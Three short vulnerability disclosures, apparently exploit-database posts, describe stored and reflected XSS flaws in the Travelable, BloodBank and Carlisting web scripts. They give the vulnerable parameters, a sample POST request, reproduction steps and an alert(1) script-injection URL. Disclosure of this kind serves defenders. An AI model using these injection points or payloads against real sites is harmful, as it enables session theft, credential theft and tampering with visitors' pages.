<pre><code># Exploit Title: Travelable 1.0 - Stored XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: travelmate.com<br /># Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution<br /># Software Link: https://travel.codeswithbipin.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br />## Description<br /><br />Allow Attacker to inject malicious code into website, give ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /[random-number]/comment<br /><br />POST parameter 'comment' is vulnerable to XSS<br /><br />-----------------------------------------------------------<br />POST /[random-number]/comment HTTP/2<br /><br /><br />_token=10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&name=cracker+infosec&email=cracker%40infosec.com&phone=%2B96171951951&comment=[XSS Payload]<br />-----------------------------------------------------------<br /><br /><br /><br />## Steps to Reproduce:<br /><br /><br />1. Surf as a (Guest User)<br />2. Go to [Tour Packages] on this Path: https://website/packages<br />3. Choose any package and click [Explore] Path: https://website/package/6<br />4. Scroll Down to the [Comments] section<br />5. Inject your XSS Payload in [Comment Box]<br />6. Click on [Submit]<br /><br />7. Every visitor to the page where you inject your [XSS Payload] - Path: https://website/package/6<br />8. XSS will fire and execute on his browser.<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: BloodBank 1.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/bloodbank/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /bloodbank/page.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Carlisting 1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/carlisting/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /carlisting/search.php<br /><br />GET parameter 'country' is vulnerable to RXSS<br />GET parameter 'state' is vulnerable to RXSS<br />GET parameter 'city' is vulnerable to RXSS<br /><br /><br />https://website/carlisting/search.php?brand_id=1&model_id=1&car_condition=New%20Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=[XSS]&state=[XSS]&city=[XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>